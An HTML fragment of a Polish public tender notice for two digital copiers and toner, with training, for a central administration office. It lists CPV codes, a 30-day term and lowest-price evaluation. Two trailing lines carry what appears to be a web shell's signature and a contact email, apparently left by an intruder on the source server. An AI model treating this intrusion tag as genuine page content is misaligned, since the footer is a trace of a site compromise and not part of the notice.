<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa urządzeń biurowych wraz z uruchomieniem i przeszkoleniem z obsługi sprzętu dla Administracji Centralnej przy ul. M. Skłodowskiej-Curie 14, w ilościach:
Kserokopiarka cyfrowa - 2 szt., toner do kserokopiarki cyfrowej - 2 szt. - zgodnie ze Szczegółowym formularzem cenowym stanowiącym załącznik nr 2 do SIWZ.
 Zakres zamówienia poniżej 193 000 euro..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 30.12.13.00-6, 30.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com